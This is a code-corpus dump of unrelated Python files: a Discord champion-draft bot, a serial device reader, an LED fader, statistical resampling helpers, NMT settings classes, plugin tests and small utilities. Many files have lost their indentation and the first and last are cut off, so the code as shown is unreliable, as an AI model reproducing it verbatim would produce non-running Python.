Button('scroll', 'tall_turn', 0x0b),
Button('scroll', 'short_turn', 0x0c),
Button('dial', 'press', 0x38),
Button('dial', 'turn', 0x0f),
]
BYTEMAP = {b.byte: b for b in BUTTONS}
MAP = {
'prime': {b.key: b
for b in BUTTONS if b.group == 'prime'},
'kit': {b.key: b
for b in BUTTONS if b.group == 'kit'},
'knob': {b.key: b
for b in BUTTONS if b.group == 'knob'},
'scroll': {b.key: b
for b in BUTTONS if b.group == 'scroll'},
'dial': {b.key: b
for b in BUTTONS if b.group == 'dial'},
}
class Reader:
def __init__(self, dev_path):
if dev_path is not None and not dev_path.exists():
            logger.warning('Specified device does not exist')
dev_path = None
if dev_path is None:
logger.info('Searching for device')
for d in Path('/sys/class/tty/').glob('*ACM*'):
uevent = d.joinpath('device/uevent').read_text()
if UEVENT_PRODUCT in uevent:
dev_path = Path('/dev').joinpath(d.name)
logger.info('Identified device %s', dev_path)
break
if dev_path is None or not dev_path.exists():
raise RuntimeError('Could not find a device')
self.dev_path = dev_path
self.serial = None
def __enter__(self):
logger.info('Starting TourBox Reader')
self.serial = serial.Serial(str(self.dev_path), timeout=2)
return self
def __exit__(self, exc_type, exc_value, traceback):
logger.info('Halting TourBox Reader')
def tick(self):
try:
bs = self.serial.read()
except serial.SerialException:
msg = 'Can\'t read: %s, maybe unplugged or no permission?'
logging.error(msg, self.dev_path)
raise RuntimeError('Lost device')
if len(bs) > 0:
b = bs[0]
btn = BYTEMAP.get(b & BUTTON_MASK, None)
if btn is None:
                logger.warning(f'Unknown byte {hex(b)}')
release = bool(b & RELEASE_MASK)
reverse = bool(b & REVERSE_MASK)
logger.debug('Read: %s, rel=%s, rev=%s', btn, release, reverse)
return (btn, release, reverse)
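# Usage sketch (added illustration; the polling pattern is an assumption, the API
# calls are the ones defined above):
#
#     with Reader(None) as reader:          # None triggers automatic device discovery
#         while True:
#             event = reader.tick()
#             if event is not None:
#                 btn, release, reverse = event
#                 logger.info('%s release=%s reverse=%s', btn, release, reverse)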
| StarcoderdataPython |
3299089 | <filename>JumpscaleLibs/tools/markdowndocs/macros/gpdf.py
import re
DOC_INFO_REGEX = r"([a-zA-Z]+)\/d\/([a-zA-Z0-9-_]+)"
def gpdf(doc, link, **kwargs):
"""generate pdf download link from google drive link to document or presentation
:param doc: current document
:type doc: Doc
:param link: full url of document or presentation
:type link: str
:return: a download link to document/presentation as pdf
:rtype: str
"""
j = doc.docsite._j
link = link.strip()
match = re.search(DOC_INFO_REGEX, link)
if match:
doc_type, file_id = match.groups()
if doc_type not in ("document", "spreadsheets", "presentation"):
raise j.exceptions.Value(f"{doc_type} is not a supported document type ()")
pdf_link = f"/wiki/gdrive/{doc_type}/{file_id}"
# normal markdown links will be resolved by docsify, won't work
return f"""```inline_html
<a href="{pdf_link}">download as pdf</a>
```
"""
raise j.exceptions.Value(f"cannot extract document type of id from an invalid link '{link}''")
| StarcoderdataPython |
1601111 | '''
Created on 27 Jul 2017
@author: julianporter
'''
import traceback
from numbers import Number
import logging
class OSGridError(Exception):
def __init__(self,message,inner=None):
super(OSGridError,self).__init__()
self.message='OSGridConverter error: {}'.format(message)
self.inner=inner
self.traceback=traceback.format_stack()
def __str__(self):
return self.message
def areNumbers(args):
return all([isinstance(x,Number) and not isinstance(x,bool) for x in args])
class Log(object):
def __init__(self,level=None):
self.logger=logging.getLogger()
if level:
handler=logging.StreamHandler()
self.logger.setLevel(level)
else:
handler=logging.NullHandler()
self.logger.addHandler(handler)
def debug(self,*args):
self.logger.debug(args[0].format(*args[1:]))
def info(self,*args):
self.logger.info(args[0].format(*args[1:]))
def warning(self,*args):
self.logger.warning(args[0].format(*args[1:]))
def error(self,*args):
self.logger.error(args[0].format(*args[1:]))
def exception(self,e):
        self.logger.error('{} {}'.format(e, traceback.format_exc()))
log=Log()
| StarcoderdataPython |
3223790 | import os
from typing import Any
from pydantic import BaseSettings as Settings
from pydantic import EmailStr, validator
from fastapi_mail.schemas import validate_path
from jinja2 import Environment, FileSystemLoader
class ConnectionConfig(Settings):
MAIL_USERNAME: str
MAIL_PASSWORD: str
MAIL_PORT: int = 465
MAIL_SERVER: str
MAIL_TLS: bool = False
MAIL_SSL: bool = True
MAIL_DEBUG: int = 1
MAIL_FROM: EmailStr
TEMPLATE_FOLDER: Any = None
@validator("TEMPLATE_FOLDER", pre=True)
def create_template_engine(cls, v):
template_env = None
if isinstance(v, str):
if os.path.isdir(v) and os.access(v, os.R_OK) and validate_path(v):
template_env = Environment(
loader=FileSystemLoader(v))
return template_env
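# Usage sketch (added illustration; all values below are placeholders):
#
#     conf = ConnectionConfig(
#         MAIL_USERNAME="user",
#         MAIL_PASSWORD="secret",
#         MAIL_SERVER="smtp.example.com",
#         MAIL_FROM="user@example.com",
#         TEMPLATE_FOLDER="./templates",  # becomes a jinja2 Environment if readable, else None
#     )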
| StarcoderdataPython |
177383 | import uasyncio as asyncio
class LedStripController:
def __init__(self, enc, button_pin, fader_pins):
''' enc should be an instance of Encoder.
button_pin is expected to be an instance of machine.Pin.
fader_pins is expected to be an iterable of machine.PWM's.
'''
self.enc = enc
self.is_on = False
self.enc_cur_val = 511
self.fader_target_val = 0
self.button_pin = button_pin
self.fader_pins = fader_pins
self.button_pressed = False
for fader in self.fader_pins:
fader.duty(0)
def toggle_led_state(self):
self.button_pressed = True
print('Button pressed!')
async def switch_loop(self, enc):
self.button_pressed = False
while True:
if self.button_pressed:
                # TODO should remove debouncing; should be handled outside of this class.
                # Shouldn't care that it's a button that triggers the change...
                await asyncio.sleep_ms(100)  # Debounce duration
# Only alter state if button still pressed (not a transient event)
if not self.button_pin.value():
if self.is_on:
# Turning off, fading out
print('Turning off at {}'.format(self.enc_cur_val))
self.fader_target_val = 0
else:
# Turning on, fading in
print('Turning on at {}'.format(self.enc_cur_val))
self.fader_target_val = enc._value = self.enc_cur_val
self.button_pressed = False
self.is_on = not self.is_on
await asyncio.sleep_ms(100)
async def encoder_loop(self, enc):
oldval = 0
while True:
if self.is_on:
self.enc_cur_val = enc.value
enc.cur_accel = max(0, enc.cur_accel - enc.accel)
if oldval != self.enc_cur_val:
print('Old enc. val: %i, new enc. val: %i' % (oldval, self.enc_cur_val))
self.fader_target_val = oldval = self.enc_cur_val
await asyncio.sleep_ms(50)
async def fader_loop(self):
FADER_MAX_STEP = 5
FADER_DELAY_MS = 5
fader_cur_val = 0
while True:
if self.fader_target_val > fader_cur_val:
step = min(FADER_MAX_STEP, self.fader_target_val - fader_cur_val)
elif self.fader_target_val < fader_cur_val:
step = -min(FADER_MAX_STEP, fader_cur_val - self.fader_target_val)
else:
step = 0
fader_cur_val += step
if abs(step) > 0:
for fader in self.fader_pins:
fader.duty(fader_cur_val)
await asyncio.sleep_ms(FADER_DELAY_MS)
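# Wiring sketch for MicroPython (added illustration; pin numbers, PWM setup and the
# Encoder driver are assumptions, not part of this module):
#
#     import machine
#     button = machine.Pin(0, machine.Pin.IN, machine.Pin.PULL_UP)
#     faders = [machine.PWM(machine.Pin(4), freq=1000)]
#     enc = Encoder(...)  # rotary encoder driver providing .value, .accel, .cur_accel
#     ctrl = LedStripController(enc, button, faders)
#     button.irq(lambda pin: ctrl.toggle_led_state(), machine.Pin.IRQ_FALLING)
#     loop = asyncio.get_event_loop()
#     loop.create_task(ctrl.switch_loop(enc))
#     loop.create_task(ctrl.encoder_loop(enc))
#     loop.run_until_complete(ctrl.fader_loop())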
| StarcoderdataPython |
94358 | def save_file(contents):
with open("path_to_save_the_file.wav", 'wb') as f:
f.write(contents)
return "path_to_save_the_file.wav"
| StarcoderdataPython |
179929 | <filename>nematus/settings.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Configuration containers.
"""
import uuid
class DecoderSettings(object):
def __init__(self, parsed_console_arguments=None):
"""
Decoder settings are initialised with default values, unless parsed
console arguments as returned by a `ConsoleInterface`'s `parse_args()`
method are provided.
"""
self.models = []
self.num_processes = 1
self.device_list = []
self.verbose = False
self.num_attentions = 1
self.num_encoders = 1
self.multisource = None
if parsed_console_arguments:
self.update_from(parsed_console_arguments)
def update_from(self, parsed_console_arguments):
"""
Updates decoder settings based on @param parsed_console_arguments,
as returned by a `ConsoleInterface`'s `parse_args()` method.
"""
args = parsed_console_arguments
self.models = args.models
self.num_processes = args.p
self.device_list = args.device_list
self.verbose = args.v
# multisource
if not hasattr(args, 'aux_input'):
self.multisource = False
self.num_inputs = 1
elif len(args.aux_input) > 0:
self.multisource = True
self.num_inputs = len(args.aux_input) + 1
else:
self.multisource = False
self.num_inputs = 1
class TranslationSettings(object):
ALIGNMENT_TEXT = 1
ALIGNMENT_JSON = 2
def __init__(self, parsed_console_arguments=None):
"""
Translation settings are initialised with default values, unless parsed
console arguments as returned by a `ConsoleInterface`'s `parse_args()`
method are provided.
"""
self.request_id = uuid.uuid4()
self.beam_width = 5
self.normalization_alpha = 0.0
self.char_level = False
self.n_best = 1
self.suppress_unk = False
self.get_word_probs = False
self.get_alignment = False
self.alignment_type = None
self.alignment_filename = None
self.aux_alignment_filenames = []
self.get_search_graph = False
self.search_graph_filename = None
self.multisource = False
self.predicted_trg = False
if parsed_console_arguments:
self.update_from(parsed_console_arguments)
def update_from(self, parsed_console_arguments):
"""
Updates translation settings based on @param parsed_console_arguments,
as returned by a `ConsoleInterface`'s `parse_args()` method.
"""
args = parsed_console_arguments
self.beam_width = args.k
self.normalization_alpha = args.n
self.char_level = args.c
self.n_best = args.n_best
self.suppress_unk = args.suppress_unk
self.get_word_probs = args.print_word_probabilities
if args.output_alignment:
self.get_alignment = True
self.alignment_filename = args.output_alignment
# alignments for multiple inputs
for i in range(len(args.aux_input)):
                self.aux_alignment_filenames.append(open(args.output_alignment.name + '_aux' + str(i + 1), 'w'))
if args.json_alignment:
self.alignment_type = self.ALIGNMENT_JSON
else:
self.alignment_type = self.ALIGNMENT_TEXT
else:
self.get_alignment = False
if args.search_graph:
self.get_search_graph = True
self.search_graph_filename = args.search_graph
else:
self.get_search_graph = False
self.search_graph_filename = None
if args.aux_input is not None:
self.multisource = True
else:
self.multisource = False
self.predicted_trg = args.predicted_trg
class ServerSettings(object):
def __init__(self, parsed_console_arguments=None):
"""
Server settings are initialised with default values, unless parsed
console arguments as returned by a `ConsoleInterface`'s `parse_args()`
method are provided.
"""
self.style = "Nematus" #TODO: use constant
self.host = "localhost"
self.port = 8080
if parsed_console_arguments:
self.update_from(parsed_console_arguments)
def update_from(self, parsed_console_arguments):
"""
Updates decoder settings based on @param parsed_console_arguments,
as returned by a `ConsoleInterface`'s `parse_args()` method.
"""
args = parsed_console_arguments
self.style = args.style
self.host = args.host
self.port = args.port
| StarcoderdataPython |
1637926 | <reponame>bjester/project-leda<gh_stars>0
#!/usr/bin/python3
import os
import time
import sys
from argparse import ArgumentParser
from leda import leda, factory, debug
print("Python version " + sys.version)
# RPi cam
cam_period = 5 # in seconds
# Daughter (sensor) board over twi
twi_period = 1 # in seconds
twi_path = "/dev/ttyACM0" # db appears here by default
twi_baud = 38400
twi_timeout = 1 # in seconds
gps_host = 'localhost'
gps_port = '2947'
parser = ArgumentParser()
parser.add_argument('--debug', dest='debug', action='store_true')
parser.set_defaults(debug=False)
args = parser.parse_args()
#########################################################
# main entry point: set up output directories, build the components, and run the loop
if __name__ == "__main__":
# create directory for this run
output_dir = "/home/pi/project-leda/Deployment_" + time.asctime(time.localtime()).replace(' ', '_').replace(':', '') + "/"
output_pic_dir = output_dir + "pictures/"
os.mkdir(output_dir)
os.mkdir(output_pic_dir)
debugger = debug.Logger(output_dir, args.debug)
leda_factory = factory.Factory(debugger)
# init project leda
projectLeda = leda.Leda(
leda_factory.build_camera(output_pic_dir),
cam_period,
leda_factory.build_uart(twi_path, twi_baud, twi_timeout),
twi_period,
leda_factory.build_gps(gps_host, gps_port),
leda_factory.build_logger(output_dir),
debugger)
# launch the system
print("Launching Leda")
projectLeda.infinite_loop()
| StarcoderdataPython |
3353110 | from discord.ext import commands
import sys
import logging
from interface import DisrapidDb
from helpers import YouTubeHelper
from pythonjsonlogger import jsonlogger
from datetime import datetime
ADMINISTRATOR = 0x00000008
class Disrapid(commands.Bot):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# init database
try:
self.config = kwargs.pop("config")
self.db = DisrapidDb(host=self.config.db_host,
user=self.config.db_user,
passwd=self.config.db_pass,
name=self.config.db_name)
if self.config.youtube:
self.youtube = YouTubeHelper(self.config.developer_key)
except Exception as e:
logging.fatal(e)
sys.exit(1)
def load_extension(self, extension):
# logging override
super().load_extension(extension)
async def logout(self):
# override logout sequence, exit db connection first
# await self.db.close()
await super().logout()
class DisrapidConfig:
def __init__(self, *args, **kwargs):
self.db_host = kwargs.pop("db_host")
self.db_name = kwargs.pop("db_name")
self.db_pass = kwargs.pop("db_pass")
self.db_user = kwargs.pop("db_user")
self.schema_version = kwargs.pop("schema_version")
self.do_full_sync = False
class DisrapidLoggingFormatter(jsonlogger.JsonFormatter):
def add_fields(self, log_record, record, message_dict):
super(DisrapidLoggingFormatter, self).add_fields(
log_record,
record,
message_dict
)
log_record['@timestamp'] = datetime.now().isoformat()
log_record['level'] = record.levelname
log_record['logger'] = record.name
| StarcoderdataPython |
3321288 | from model.project import Project
def test_del_project(app, config):
app.session.login("administrator", "root")
app.project.open_project()
if len(app.project.get_project_list()) == 0:
app.project.create()
app.project.fill_form_project(Project(name_project=str("test"), status="stable",
description="test", view_status="public"))
app.project.confirm_add_project()
old_list_project = app.soap.get_project_list(username=config['web']["username"], password=config['web']["password"], baseUrl=config['web']['baseUrl'])
app.project.del_project()
app.project.open_project()
new_list_project = app.soap.get_project_list(username=config['web']["username"], password=config['web']["password"], baseUrl=config['web']['baseUrl'])
assert len(old_list_project) - 1 == len(new_list_project)
old_list_project[0:1] = []
assert old_list_project == new_list_project | StarcoderdataPython |
160590 | <filename>sandcastle/__init__.py<gh_stars>1-10
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
from sandcastle.api import Sandcastle, VolumeSpec, MappedDir # NOQA
from sandcastle.exceptions import ( # NOQA
SandcastleException,
SandcastleTimeoutReached,
SandcastleCommandFailed,
SandcastleExecutionError,
)
| StarcoderdataPython |
1680852 | <filename>draft.py<gh_stars>0
from discord import *
import asyncio
import json
import random
from session import DraftSession, DraftState
from errors import *
client: Client = Client()
COMMAND_PREFIX = "!"
SESSIONS = {}
CAPTAINS = {}
DRAFT_CHANNEL_ID = 698678134085779466
GUILD = 599028066991341578
NAIL_BOT_ID = 704663040682885134
# dio's draft_channel: 698678134085779466
# GVD's draft_channel: 696551201642119208
async def main() -> None:
global COMMANDS
# List of commands and their associated methods
COMMANDS = {
"help": help_command,
"draft": draft_command,
"join": join_command,
"ban": pick_command,
"pick": pick_command,
"exit": exit_command,
}
# Open secrets file and start with bot token
token = ""
with open("token.secret", "r") as f:
token = f.read()
if token != "":
await client.start(token)
@client.event
async def on_ready() -> None:
reset_draft_channel = False
async for message in client.get_channel(DRAFT_CHANNEL_ID).history():
if not message.author.bot or reset_draft_channel:
await message.delete()
elif message.embeds:
if message.embeds[0].color.value == 16753152:
await message.delete()
print("Bot Online")
@client.event
async def on_message(message: Message) -> None:
if message.author.id == NAIL_BOT_ID:
await nailbot(message)
if message.author.bot:
return
if not message.content:
return
if not message.channel.id == DRAFT_CHANNEL_ID and type(message.channel) is not DMChannel:
return
print(message.author, message.content)
    content = message.content
if message.channel.id == DRAFT_CHANNEL_ID:
await message.delete()
if content[0] == COMMAND_PREFIX:
await set_channel(message)
command = content.split(' ')[0][1:].lower()
if command in COMMANDS.keys():
await COMMANDS[command](message)
else:
channel = message.author.dm_channel
await channel.send("!" + command + " is not recognized as a command")
# set channel, check if a dm exists or create dm
async def set_channel(message: Message) -> None:
if not message.author.dm_channel:
await message.author.create_dm()
async def help_command(message: Message) -> None:
await message.author.dm_channel.send(
"`!help` : pull up this very dialog\n" \
"`!draft` : start a draft\n" \
"`!join draft id` : join a draft\n" \
"`!ban champ` : during ban phase used to ban a champion\n" \
"`!pick champ` : during pick phase used to pick a champion\n" \
"`!exit` : exit the current draft you are in"
)
async def draft_command(message: Message) -> None:
channel = message.author.dm_channel
draft_channel = client.get_channel(DRAFT_CHANNEL_ID)
if message.author.id in CAPTAINS.keys():
await channel.send("Sorry, you are already in a draft. Exit with `!exit`")
return
# creating session and adding it to active sessions
session = DraftSession()
session.captain1 = message.author
CAPTAINS[session.captain1.id] = session.session_id
SESSIONS[session.session_id] = session
await channel.send(
"- SETTING UP DRAFT -\nShare Session ID with Opposing Captain\t>>>\t`" + str(session.session_id) + "`"
)
async def join_command(message: Message) -> None:
channel = message.author.dm_channel
split_message = message.content.split(' ')
    # in the future, distinguish between already being in another draft and joining your own draft
if message.author.id in CAPTAINS.keys():
await channel.send("Sorry, you are already in a draft. Exit with `!exit`")
return
if len(split_message) == 1:
await channel.send("You did not specify a draft id. Try `!join [draft id]`")
return
# check if valid session
if split_message[1] not in SESSIONS.keys():
await channel.send("Sorry, `" + split_message[1] + "` is not a valid draft id.")
return
session = SESSIONS[split_message[1]]
# prevent more than one person joining
if session.captain2:
await channel.send("Sorry, someone already joined " + split_message[1] + ".")
return
# put captain into the draft
session.captain2 = message.author
if session.captain1.id in CAPTAINS.keys():
CAPTAINS[session.captain2.id] = session.session_id
else:
CAPTAINS[session.captain1.id] = session.session_id
await start_draft(session)
async def start_draft(session: DraftSession) -> None:
session.update_table()
# delete history and message captains
await delete_dm_history(session)
await session.captain1.dm_channel.send("- STARTING DRAFT -", embed = session.table)
await session.captain1.dm_channel.send("Phase 1: Bans (Please ban with `!ban champ`)")
await session.captain2.dm_channel.send("- STARTING DRAFT -", embed = session.table)
await session.captain2.dm_channel.send("Phase 1: Bans (Please ban with `!ban champ`)")
# post draft to draft channel
draft_channel = client.get_channel(DRAFT_CHANNEL_ID)
temp_message = await draft_channel.send(embed = session.table)
session.draft_message_id = temp_message.id
async def pick_command(message: Message) -> None:
channel = message.author.dm_channel
draft_channel = client.get_channel(DRAFT_CHANNEL_ID)
split_message = message.content.split(' ')
command = split_message[0][1:]
if message.author.id not in CAPTAINS.keys():
await channel.send("Sorry, you are not currently in a draft. Try `!draft`")
return
session = SESSIONS[CAPTAINS[message.author.id]]
phase = "ban" if str(session.state)[-3:].lower() == "ban" else "pick"
# check if user input the correct command
if phase != command:
if phase == "ban":
await channel.send("Sorry, you are not currently picking. Try `!ban champ`")
else:
await channel.send("Sorry, you are not currently banning. Try `!pick champ`")
return
if len(split_message) == 1:
await channel.send("You did not specify a champ. Try `!" + phase + " champ`")
return
# pick
try:
session.pick(message.author.id, " ".join(split_message[1:]))
except NonexistantChampion:
await channel.send(" ".join(split_message[1:]) + " is not a valid champ")
return
except BannedChampion:
await channel.send(" ".join(split_message[1:]) + " is banned by the opposing captain")
return
except DuplicateChampion:
await channel.send(" ".join(split_message[1:]) + " is already picked")
return
except DuplicateBan:
await channel.send(" ".join(split_message[1:]) + " is already banned")
return
except LateBan:
await channel.send(" ".join(split_message[1:]) + " is picked by the opposing captain")
return
if not session.check_state():
await channel.send("Waiting for opposing captain's " + phase)
return
session.update_table()
session.advance_state()
next_phase = str(session.state)[11:].lower()
# check if draft is over
if next_phase == "complete":
session.table.color = 3210243
# update dms
await delete_dm_history(session)
await session.captain1.send(embed = session.table)
await session.captain2.send(embed = session.table)
# update draft-channel
async for msg in draft_channel.history():
if msg.embeds:
if msg.id == session.draft_message_id:
await msg.edit(embed = session.table)
break
# dm nailbot if it was a naildraft
misc_channel = client.get_channel(705836678891307089)
champ_picks = session.get_champ_picks()
if session.nail_draft:
await misc_channel.send(str(session.session_id) + ',' + ','.join(champ_picks))
else:
await misc_channel.send('0,' + ','.join(champ_picks))
await close_session(message)
return
if next_phase == "second_ban":
next_phase = next_phase + " (Please **ban** with `!ban champ`)"
else:
next_phase = next_phase + " (Please **pick** with `!pick champ`)"
await delete_dm_history(session)
await session.captain1.send(embed = session.table)
await session.captain1.send(next_phase)
await session.captain2.send(embed = session.table)
await session.captain2.send(next_phase)
# update draft-channel table
async for msg in draft_channel.history():
if msg.embeds:
if msg.id == session.draft_message_id:
await msg.edit(embed = session.table)
break
async def delete_dm_history(session):
if session.captain1:
async for hist_message in session.captain1.dm_channel.history():
if hist_message.author == client.user:
if hist_message.content[:6] != "```css" and not hist_message.embeds:
await hist_message.delete()
elif hist_message.embeds:
if hist_message.embeds[0].color.value != 3210243:
await hist_message.delete()
if session.captain2:
async for hist_message in session.captain2.dm_channel.history():
if hist_message.author == client.user:
if hist_message.content[:6] != "```css" and not hist_message.embeds:
await hist_message.delete()
elif hist_message.embeds:
if hist_message.embeds[0].color.value != 3210243:
await hist_message.delete()
async def close_session(message: Message) -> None:
session = SESSIONS[CAPTAINS[message.author.id]]
cap1 = None
cap2 = None
await delete_dm_history(session)
    # notify both captains and remove them from the captain registry
if session.captain1:
cap1 = session.captain1
if session.captain2:
cap2 = session.captain2
if CAPTAINS[message.author.id] in SESSIONS.keys():
del SESSIONS[CAPTAINS[message.author.id]]
if cap1:
await cap1.dm_channel.send("Exiting draft.")
del CAPTAINS[cap1.id]
if cap2:
await cap2.dm_channel.send("Exiting draft.")
del CAPTAINS[cap2.id]
async def exit_command(message: Message) -> None:
channel = message.author.dm_channel
if message.author.id not in CAPTAINS.keys():
await channel.send("You are not in a draft. Draft with `!draft`")
return
# delete draft table from draft-channel if session exists
if CAPTAINS[message.author.id] in SESSIONS.keys():
async for msg in client.get_channel(DRAFT_CHANNEL_ID).history():
if msg.id == SESSIONS[CAPTAINS[message.author.id]].draft_message_id:
await msg.delete()
break
await close_session(message)
async def nailbot(message: Message) -> None:
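    # Expected nail-bot message format (inferred from the parsing below):
    # "<session_id> <captain1_id> <captain2_id>", posted in the draft channel.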
if not message.channel.id == DRAFT_CHANNEL_ID:
return
await message.delete()
split_message = message.content.split(' ')
guild = client.get_guild(GUILD)
captain1 = guild.get_member(int(split_message[1]))
captain2 = guild.get_member(int(split_message[2]))
session = DraftSession()
session.session_id = split_message[0]
session.nail_draft = True
session.captain1 = captain1
session.captain2 = captain2
CAPTAINS[session.captain1.id] = session.session_id
CAPTAINS[session.captain2.id] = session.session_id
SESSIONS[session.session_id] = session
if not captain1.dm_channel:
await captain1.create_dm()
if not captain2.dm_channel:
await captain2.create_dm()
await start_draft(session)
return
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(main())
| StarcoderdataPython |
3230646 | <reponame>danieldeutsch/nlpstats<gh_stars>0
import numpy as np
import numpy.typing as npt
from typing import Callable, List, Sequence, Tuple, Union
def _resample_systems(matrices: List[np.ndarray], **kwargs) -> List[np.ndarray]:
_resample_systems_iv(matrices)
m = matrices[0].shape[0]
rows = np.random.choice(m, m, replace=True)
return [matrix[rows] for matrix in matrices]
def _resample_systems_iv(matrices: List[np.ndarray]) -> None:
m = matrices[0].shape[0]
for matrix in matrices:
if matrix.shape[0] != m:
raise ValueError("Input `matrices` all must have the same number of rows")
def _resample_inputs(
matrices: List[np.ndarray], paired_inputs: bool
) -> List[np.ndarray]:
_resample_inputs_iv(matrices, paired_inputs)
if paired_inputs:
n = matrices[0].shape[1]
cols = np.random.choice(n, n, replace=True)
return [matrix[:, cols] for matrix in matrices]
else:
resamples = []
for matrix in matrices:
n = matrix.shape[1]
cols = np.random.choice(n, n, replace=True)
resamples.append(matrix[:, cols])
return resamples
def _resample_inputs_iv(matrices: List[np.ndarray], paired_inputs: bool) -> None:
if paired_inputs:
n = matrices[0].shape[1]
for matrix in matrices:
if matrix.shape[1] != n:
raise ValueError(
"Input `matrices` all must have the same number of columns"
)
def _resample_both(matrices: List[np.ndarray], paired_inputs: bool) -> List[np.ndarray]:
_resample_both_iv(matrices, paired_inputs)
matrices = _resample_systems(matrices)
return _resample_inputs(matrices, paired_inputs)
def _resample_both_iv(matrices: List[np.ndarray], paired_inputs: bool) -> None:
_resample_systems_iv(matrices)
_resample_inputs_iv(matrices, paired_inputs)
def resample(
matrices: Union[npt.ArrayLike, Sequence[npt.ArrayLike]],
resampling_method: Union[Callable, str],
paired_inputs: bool = True,
) -> Union[np.ndarray, Tuple[np.ndarray, ...]]:
matrices, resampling_method = _resample_iv(matrices, resampling_method)
resamples = resampling_method(matrices, paired_inputs=paired_inputs)
if len(resamples) == 1:
return resamples[0]
return tuple(resamples)
def _resample_iv(
matrices: Union[npt.ArrayLike, Sequence[npt.ArrayLike]],
resampling_method: Union[Callable, str],
) -> Tuple[Sequence[np.ndarray], Callable]:
# If the input is just one matrix, wrap it into a list
if isinstance(matrices, np.ndarray):
matrices = [matrices]
# Ensure all are numpy arrays
for matrix in matrices:
if not isinstance(matrix, np.ndarray):
raise TypeError(f"Input `matrices` must all be of type `np.ndarray`")
if isinstance(resampling_method, str):
if resampling_method == "systems":
resampling_method = _resample_systems
elif resampling_method == "inputs":
resampling_method = _resample_inputs
elif resampling_method == "both":
resampling_method = _resample_both
else:
raise ValueError(f"Unknown resampling method: {resampling_method}")
return matrices, resampling_method
def _permutation_iv(X: np.ndarray, Y: np.ndarray):
if X.ndim != 2:
raise ValueError(f"`X` must be two-dimensional")
if Y.ndim != 2:
raise ValueError(f"`Y` must be two-dimensional")
if X.shape != Y.shape:
raise ValueError(f"`X` and `Y` must be the same shape")
def _permute_systems(X: np.ndarray, Y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
_permutation_iv(X, Y)
# Do not modify the original matrices
X_p = X.copy()
Y_p = Y.copy()
m = X.shape[0]
mask = (np.random.rand(m, 1) > 0.5).reshape((m,))
X_p[mask] = Y[mask]
Y_p[mask] = X[mask]
return X_p, Y_p
def _permute_inputs(X: np.ndarray, Y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
_permutation_iv(X, Y)
# Do not modify the original matrices
X_p = X.copy()
Y_p = Y.copy()
n = X.shape[1]
mask = (np.random.rand(1, n) > 0.5).reshape((n,))
X_p[:, mask] = Y[:, mask]
Y_p[:, mask] = X[:, mask]
return X_p, Y_p
def _permute_both(X: np.ndarray, Y: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
X, Y = _permute_systems(X, Y)
return _permute_inputs(X, Y)
def _permute_iv(
X: npt.ArrayLike, Y: npt.ArrayLike, permutation_method: str
) -> Tuple[np.ndarray, np.ndarray, Callable]:
X = np.asarray(X)
Y = np.asarray(Y)
if isinstance(permutation_method, str):
if permutation_method == "systems":
permutation_method = _permute_systems
elif permutation_method == "inputs":
permutation_method = _permute_inputs
elif permutation_method == "both":
permutation_method = _permute_both
else:
raise ValueError(f"Unknown permutation method: {permutation_method}")
return X, Y, permutation_method
def permute(
X: npt.ArrayLike, Y: npt.ArrayLike, permutation_method: str
) -> Tuple[np.ndarray, np.ndarray]:
X, Y, permutation_method = _permute_iv(X, Y, permutation_method)
return permutation_method(X, Y)
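# Small runnable example (added illustration, not part of the original module):
# bootstrap-resample and permute two random 5x10 score matrices.
if __name__ == "__main__":
    X_demo = np.random.rand(5, 10)
    Y_demo = np.random.rand(5, 10)
    # Resample systems (rows) and inputs (columns) jointly for both matrices.
    X_boot, Y_boot = resample([X_demo, Y_demo], "both", paired_inputs=True)
    # Randomly swap whole systems (rows) between the two matrices.
    X_perm, Y_perm = permute(X_demo, Y_demo, "systems")
    print(X_boot.shape, Y_boot.shape, X_perm.shape, Y_perm.shape)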
| StarcoderdataPython |
3288879 | <reponame>eleeeeeee/abc<filename>tests/test_plugin_vk.py
import unittest
from streamlink.plugins.vk import VK
class TestPluginVK(unittest.TestCase):
def test_follow_vk_redirect(self):
# should redirect
self.assertEqual(VK.follow_vk_redirect(
"https://vk.com/videos-24136539?z=video-24136539_456241176%2Fclub24136539%2Fpl_-24136539_-2"),
"https://vk.com/video-24136539_456241176"
)
self.assertEqual(VK.follow_vk_redirect(
"https://vk.com/videos-24136539?z=video-24136539_456241181%2Fpl_-24136539_-2"),
"https://vk.com/video-24136539_456241181"
)
# shouldn't redirect
self.assertEqual(VK.follow_vk_redirect("http://vk.com/"), "http://vk.com/")
self.assertEqual(VK.follow_vk_redirect("http://vk.com/videos-24136539"), "http://vk.com/videos-24136539")
self.assertEqual(VK.follow_vk_redirect("http://www.youtube.com/"), "http://www.youtube.com/")
def test_can_handle_url(self):
# should match
self.assertTrue(VK.can_handle_url("https://vk.com/video-9944999_456239622"))
self.assertTrue(VK.can_handle_url("http://vk.com/video-24136539_456239830"))
self.assertTrue(VK.can_handle_url("https://www.vk.com/video-34453259_456240574"))
self.assertTrue(VK.can_handle_url("https://vk.com/videos-24136539?z=video-24136539_456241155%2Fpl_-24136539_-2"))
# shouldn't match
self.assertFalse(VK.can_handle_url("https://vk.com/"))
self.assertFalse(VK.can_handle_url("https://vk.com/restore"))
self.assertFalse(VK.can_handle_url("https://www.vk.com/videos-24136539"))
self.assertFalse(VK.can_handle_url("http://vk.com/videos-24136539"))
self.assertFalse(VK.can_handle_url("http://www.youtube.com/"))
| StarcoderdataPython |
3369091 | import json
import os.path as osp
from collections import namedtuple, OrderedDict, defaultdict
from enum import Enum
from numbers import Number
import numpy as np
GitInfo = namedtuple(
'GitInfo',
[
'directory',
'code_diff',
'code_diff_staged',
'commit_hash',
'branch_name',
],
)
def save_git_info(logdir):
git_infos = get_git_info()
if git_infos is not None:
for (
directory, code_diff, code_diff_staged, commit_hash, branch_name
) in git_infos:
if directory[-1] == '/':
diff_file_name = directory[1:-1].replace("/", "-") + ".patch"
diff_staged_file_name = (
directory[1:-1].replace("/", "-") + "_staged.patch"
)
else:
diff_file_name = directory[1:].replace("/", "-") + ".patch"
diff_staged_file_name = (
directory[1:].replace("/", "-") + "_staged.patch"
)
if code_diff is not None and len(code_diff) > 0:
with open(osp.join(logdir, diff_file_name), "w") as f:
f.write(code_diff + '\n')
